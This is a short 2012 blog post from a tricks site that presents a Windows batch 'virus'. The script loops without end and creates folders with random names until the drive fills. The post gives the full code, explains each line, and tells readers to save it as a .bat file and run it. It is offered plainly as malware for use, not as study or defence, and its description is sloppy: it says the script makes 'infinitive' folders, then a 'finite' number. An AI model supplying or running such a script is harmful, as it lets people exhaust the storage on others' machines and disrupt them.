Search This Blog Here

Saturday, 17 November 2012

Create VIrus To Create Infinitive File Folder In A Drive

VirusHello Friends, create infinitive file with the help of this batch code which will be very helpful for you.  This is simple and effective virus code.As usual open notepad.
Copy this code to Notepad.

@echo off
:top
md %random%
goto top

 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

Save the file with .bat extension(for eg: folderscreate.bat)

That’s all if you double click the file it will create a finite folder wherever the batch file is.

0 Responses to “Create VIrus To Create Infinitive File Folder In A Drive”

Post a Comment

Related Posts Plugin for WordPress, Blogger...
IF YOU DON'T GOT WHAT YOU ARE FIND OR YOU OCCUR ANY PROBLEM THEN Click Here
All Rights Reserved Supper Tricks | Blogger Template by Bloggermint